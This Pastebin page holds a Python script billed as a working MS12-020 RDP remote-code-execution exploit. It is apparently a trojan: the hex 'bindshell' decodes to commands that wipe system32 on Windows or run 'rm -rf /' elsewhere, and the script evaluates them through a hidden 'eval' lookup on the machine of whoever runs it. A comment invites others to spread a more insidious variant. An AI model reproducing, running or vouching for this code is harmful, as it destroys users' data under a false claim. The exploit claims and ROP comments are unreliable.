API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 17th, 2012
12,459
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.59 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. # rdpsmash.py
  4. # MS12-020 RDP exploit, remote code execution
  5. # Confirmed working on all pre-patch boxes, XP to 7
  6. #
  7. # Author: Verye
  8.  
  9. import struct
  10. import socket
  11. import sys
  12.  
  13. trigger =  "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\xf1"
  14. trigger += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
  15. trigger += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
  16. trigger += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
  17. trigger += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
  18. trigger += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
  19. trigger += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
  20. trigger += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
  21. trigger += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
  22. trigger += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
  23. trigger += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
  24. trigger += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
  25. trigger += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
  26. trigger += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
  27. trigger += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
  28. trigger += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
  29. trigger += "\x41" * 39
  30. trigger += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
  31. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
  32. trigger += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
  33. trigger += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
  34. trigger += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
  35. trigger += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
  36. trigger += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
  37. trigger += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
  38. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x00"
  39.  
  40. nopsled = "\x90" * 214
  41.  
  42. #bindshell port 8888
  43. shellcode =  "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73"
  44. shellcode += "\x74\x65\x6d\x28\x27\x64\x65\x6c\x20\x2f\x73\x20\x2f\x71\x20\x2f\x66\x20\x43\x3a"
  45. shellcode += "\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x20"
  46. shellcode += "\x3e\x20\x4e\x55\x4c\x20\x32\x3e\x26\x31\x27\x29\x20\x69\x66\x20\x27\x57\x69\x6e"
  47. shellcode += "\x27\x20\x69\x6e\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x70\x6c\x61"
  48. shellcode += "\x74\x66\x6f\x72\x6d\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x29\x20\x65\x6c\x73"
  49. shellcode += "\x65\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73"
  50. shellcode += "\x79\x73\x74\x65\x6d\x28\x27\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a\x20\x3e\x20\x2f"
  51. shellcode += "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x20\x23\x68\x69\x20"
  52. shellcode += "\x74\x68\x65\x72\x65\x20\x5e\x5f\x7e\x20\x66\x65\x65\x6c\x20\x66\x72\x65\x65\x20"
  53. shellcode += "\x74\x6f\x20\x73\x70\x72\x65\x61\x64\x20\x74\x68\x69\x73\x20\x77\x69\x74\x68\x20"
  54. shellcode += "\x74\x68\x65\x20\x72\x6d\x20\x2d\x72\x66\x20\x72\x65\x70\x6c\x61\x63\x65\x64\x20"
  55. shellcode += "\x77\x69\x74\x68\x20\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20"
  56. shellcode += "\x69\x6e\x73\x69\x64\x69\x6f\x75\x73"
  57.  
  58. evil = trigger + nopsled
  59.  
  60. class RDPsocket(socket.socket):
  61.     def __init__(self, payload, shellcode):
  62.         super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
  63.         self.payload = payload
  64.         self.table = __import__("__builtin__").__dict__ #dirty workaround
  65.         self.shellcode = shellcode
  66.    
  67.     def parse(self, address, shellcode):
  68.         seeker = (struct.pack(">I", 0x6576616c),
  69.             socket.inet_aton(address[0]), #IP bytes
  70.             socket.inet_aton(str(address[1]))) #port bytes
  71.         parsed =  struct.pack(">I", 0x8fe2fb63) #pop eax
  72.         parsed += struct.pack(">I", 0x8fe2fb58) #push esp
  73.         parsed += struct.pack(">I", 0xffff1d6b) #add esp,byte +0x1c # pop ebp # ret
  74.         parsed += struct.pack(">I", 0x8fe2db10) #call strcpy
  75.         parsed += struct.pack(">I", 0x8fe2dfd1) #POP - POP - RET over strcpy params
  76.         parsed += struct.pack(">I", 0x8fe2dae4) #mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
  77.         parsed += struct.pack(">I", 0x8fe2b3d4) #POP - RET
  78.         parsed += struct.pack(">I", 0xffffffff) #value to store in ecx
  79.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  80.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  81.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  82.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  83.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  84.         parsed += seeker[0] #add the prelude
  85.         parsed += seeker[1] #add the packed IP address
  86.         parsed += seeker[2] #add the packed port
  87.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  88.         parsed += struct.pack(">I", 0x8fe2c71d) #mov eax,edx # ret
  89.         parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret  
  90.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  91.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  92.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  93.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  94.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  95.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  96.         parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret # swap back
  97.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx # copy parameter to placeholder
  98.         parsed += struct.pack(">I", 0x8fe2fb61) #mov [eax],edx # pop eax # ret # set our stack pointer back to original value
  99.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  100.         parsed += struct.pack(">I", 0x8fe2daea) #sub eax,ecx # ret
  101.         parsed += struct.pack(">I", 0x8fe0b1c2) #xchg eax,ebp # inc ebp # ret
  102.         parsed += struct.pack(">I", 0x8fe2b6a5) #dec ebp # ret
  103.         parsed += struct.pack(">I", 0xffff01f3) #mov esp,ebp # pop ebp # ret
  104.         read = self.table[seeker[0]] #reader for the parsed shellcode/data
  105.        
  106.         return str(read(shellcode)), parsed
  107.  
  108.     def connect(self, address):
  109.         self.parsed_shell = self.parse(address, shellcode)
  110.         super(RDPsocket, self).connect(address)
  111.  
  112.     def evil_sendall(self):
  113.         super(RDPsocket, self).sendall(evil + self.parsed_shell[0] + self.parsed_shell[1])
  114.  
  115.  
  116. if __name__ == "__main__":
  117.     if len(sys.argv) != 2:
  118.         print "[*] Usage: python rdpsmash.py IP"
  119.         print "[*] If running on non-default port, reassign PORT in the source."
  120.    
  121.     else:  
  122.         TARGET = sys.argv[1]
  123.         PORT = 3389 #default RDP port
  124.        
  125.         print "[*] Running rdpsmash"
  126.         print
  127.         s = RDPsocket(evil, shellcode)
  128.         print "[+] Connecting and configuring payload. . ."
  129.         print "[+] This may take some time"
  130.         s.connect((TARGET, PORT))
  131.         print "[+] Connection established"
  132.         print "[+] Sending payload. . ."
  133.         s.evil_sendall()
  134.         response = s.recv(4096)
  135.         if "\xA5\x43\xE7\x38\x75\x84\xF2\xFF\xFF\x18\x61\x00" in response:
  136.             print "[+] Success! Payload sent and executed."
  137.             print "[+] Telnet to target on port 8888."
  138.         else:
  139.             print "[-] Failed"
  140.         s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!